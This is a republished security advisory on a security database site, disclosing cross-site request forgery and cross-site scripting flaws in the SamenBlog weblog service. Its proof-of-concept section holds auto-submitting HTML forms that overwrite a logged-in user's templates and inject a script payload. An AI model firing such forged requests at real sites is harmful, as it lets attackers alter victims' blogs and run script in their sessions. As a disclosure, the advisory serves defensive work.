SamenBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting

2016.02.23
Credit: Ehsan Hosseini
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

Document Title: =============== SamenBlog Weblog Service - Cross Site Request Forgery / Cross Site Scripting References (Source): ==================== http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt Release Date: ============= 2016-02-20 Product & Service Introduction: =============================== Samenblog allows its users to publish their information, memories, essays, etc to experience and enjoy a professional weblog-publishing system in a basic environment and also it has tried to provide a system for both professional and amateur users. Vulnerability Type: ========================= Cross Site Request Forgery Cross Site Scripting Vulnerability Details: ============================== I discovered a client-side cross site request forgery web vulnerability and a cross site scripting vulnerability in Samenblog.com (Weblog Service). Author: ================= Ehsan Hosseini http://ehsansec.ir/ Exploitation Technique: ======================= Remote Severity Level: =============== Medium Proof of Concept (PoC): ======================= -- Cross Site Request Forgery -- -- PoC : Edit Themes -- -- PoC 1 -- <html> <head> <title>Edit Weblog Template - Csrf</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='info'> <input type="hidden" name="template" value="<h1> PoC </h1>"> <input type='hidden' name='task' value='doedit'> </form> </body> -- PoC 2 -- <html> <head> <title>Edit The extra pages templates - Csrf</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='infoo'> <input name='templatepage' value="<h1> PoC </h1>"> <input type='hidden' name='task' value='doeditpage'> </form> </body> </html> -- PoC 3 -- <html> <head> <title>Edit The archive templates - Csrf</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='infooo'> <input name='templatearchive' value="<h1> PoC </h1>"> <input type='hidden' name='task' value='doeditarchive'> </form> </body> </html> -- Cross Site Scripting -- <html> <head> <title>Cross Site Scripting</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/preview.php' method='POST' name='preview'> <input name='templatearchive' value="<script>alert('Ehsan')</script>"> </form> </body> </html> Author: ================== Ehsan Hosseini http://ehsansec.ir/ Contact: ======== hehsan979@gmail.com info@ehsansec.ir

References:

http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top